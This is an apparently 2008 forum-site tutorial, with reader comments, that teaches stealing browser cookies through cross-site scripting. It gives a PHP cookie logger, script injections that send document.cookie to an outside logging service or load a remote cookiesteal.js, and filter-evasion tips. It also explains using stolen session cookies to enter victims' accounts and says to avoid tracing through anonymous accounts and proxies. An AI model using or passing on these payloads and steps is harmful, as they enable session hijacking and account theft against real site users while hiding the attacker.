Donate to us!
You cannot teach a man anything; you can only help him find it within himself. - Galileo
Thursday, July 19, 2018
 Need Help?
Members Online
Total Online: 118
Guests Online: 115
Members Online: 3

Registered Members: 105844
Newest Member: stevenjohnson
Latest Articles

Cookie Stealing Via XSS

Arrow Image An article on cookie stealing, using XSS.

In this tutorial I'll try to explain the procedure of cookie stealing through XSS in a few simple steps. This way you can apply it to any site you want, but I'll stick to for this walkthrough.

Step one: Finding a XSS vulnerability

I assume everyone who wants to learn cookie stealing through XSS already knows how to find XSS vulnerabilities, so I won't explain this in detail here.

For this walkthrough we'll stick with a simple GET variable XSS, just to make it easier. If you understand this and have some basic knowledge about the POST method, you'll be able to make autosubmitting pages for POST XSS vulnerabilities yourself.

Here's our PoC XSS vulnerability:

When this page is loaded, a popup message saying "123" should be displayed. This means we have our vulnerability.

Step two: Setting up a cookie stealer

If we want to steal cookies, we'll need for example a PHP page which stores them for us. A simple cookie stealer can look like this:

$cookie = $HTTP_GET_VARS["cookie"];
$file = fopen('log.txt', 'a');
fwrite($file, $cookie . "\n\n");

However there are other ways to log the cookie as well. In my opinion, the best and most secure way is to use WhiteAcid's Community Cookie Logger (CCL) which can be found at http://ccl.whitea. . .

If you use your own server or host account for cookie stealing, it's easy for others to track you down. Therefore we'll use CCL in this walkthrough. Registering at CCL gives you an anonymous account with a random ID number instead of a username. For this tutorial I just use a fake account with the ID 123456.

So now, we just check the CCL service by executing a test string. We go to
http://ccl.whitea. . .st_for_XSS.
We MUST include our ID number in the test URL, otherwise it won't show up in our logs. Then we login to CCL and see the new entry with our IP, referer, user agent and of course the data "test_for_XSS". The cookie logger works fine.

Step three: Logging a cookie

So we have a XSS vulnerability and we have a cookie logger. Now we just have to connect them to each other.

We make a new injection (instead of that alert thing) which sends the cookie data. It could look like this:

Code"><script>location.href = ''+document.cookie;</script>

If the site doesn't use addslashes() or any other filters that mess up our injection, we have successfully captured the cookie and saved it in our CCL account! From here, we can copy the users' cookies (most commonly the sessions) to our own cookies and get into their accounts...

Step four: Filter evasion

Let's say we encountered the following common problem: the target page uses addslashes() on the GET variable before printing it, which kills our injection by destroying our quotes. No problem, we just have to do it another way then ;)

We register a new account on a free hosting site (I'll use the account Uber0n for this walkthrough) and make a new script file there. I make a file called cookiesteal.js and give it the following content:
location.href = ''+document.cookie;

Now we call the script through the XSS vulnerable page:
Code"><script src=>

Login to CCL once again and you'll see the new entry! However, remember NOT to register the account on the hosting site with your normal nickname and make sure you register using a good proxy so that you can't be tracked. You can also ask to host your script files.

If you encounter other filters than addslashes, try running the scripts through iframes, images etc. Some good filter evasion techniques can be found at

http://www.xssing. . .ex.php?x=1
http://ha.ckers.o. . .

Feel free to contact me if you have any questions.
// Uber0n


Shazrahon July 09 2008 - 19:33:14
skit bra artikel Pfft great article :happy:
Uber0non July 09 2008 - 19:54:25
@Shazrah: Thanks man :happy:
skathgh420on July 09 2008 - 20:19:36
wow nice article and very well written Grin
Futilityon July 09 2008 - 20:26:36
What is this? An article that actually teaches you something and wasn't copy/pasted? How did this get accepted? Great work Uber0n, thanks a lot.
SaMTHGon July 09 2008 - 20:31:20
Excell-on-tat Awesome!(RATED)
slpctrlon July 09 2008 - 20:44:10
Very very nice article Wink
Uber0non July 09 2008 - 20:44:47
Thanks for your nice comments everyone Grin
system_meltdownon July 09 2008 - 20:58:34
You should use $_GET['cookie'] instead of $HTTP_GET_VARS["cookie"]; Wink But nice article Smile Hehe Smile
Mephistoon July 09 2008 - 22:55:26
Needs moore understanding of Javascript principles. Remove the link to the XSS Cheatsheet (newbies Sad) and add more ways to XSS/exploit Javascript.
M4zh4ron July 10 2008 - 03:37:52
just two word. Awesome and awesome.
darksunon July 10 2008 - 08:10:48
Uber0n the teacher...hehehe... nice1 :happy:
Uber0non July 10 2008 - 10:23:24
@system_meltdown: I'll change that next time I update the article. @spyware/Mephisto: The links are here to stay, but I could always add a few more examples of filter breaking and stuff ^^
korgon July 11 2008 - 02:47:14
I think this article totally sucked balls should have never been posted.... HaHa just kinding UberOn, Nice article Excellent job, Should help a lot of people. We need alot more like this. 15/10.
SaMTHGon July 11 2008 - 19:14:16
@korg: It's spelt Uber0n with a zero istead of a Cap o...just to let you know not being mean or anything.
god_peeton July 11 2008 - 23:20:21
w000t a great article XD
korgon July 14 2008 - 02:10:31
@SaMTHG Hit the wrong key Uber0n has been here almost as long as me. I know who he is. Oh, Don't EVER correct me again!Grin
korgon July 14 2008 - 02:57:48
PS: I gotta stop drinking and posting.Wink
Uber0non July 16 2008 - 16:35:10
@korg: Nah, keep on posting ^^ it doesn't matter if you're sober or not Grin
fallingmidgeton August 15 2008 - 23:54:00
@korg: you post like you're always drunk
Uber0non August 16 2008 - 19:13:20
@fallingmidget: Maybe he is, maybe he isn't Wink
Hacktivist_704on August 27 2008 - 18:04:48
I've tried a site without addslashes and the cookie I get is my script encrypted:/
korgon September 04 2008 - 10:24:18
HEY, I'm not always drunk just at night.Grin
Uber0non September 12 2008 - 07:49:36
@Hacktivist_704: You probably have the wrong syntax ^^ you can PM me if you'd like some help.
Post Comment


You must have completed the challenge Basic 1 and have 100 points or more, to be able to post.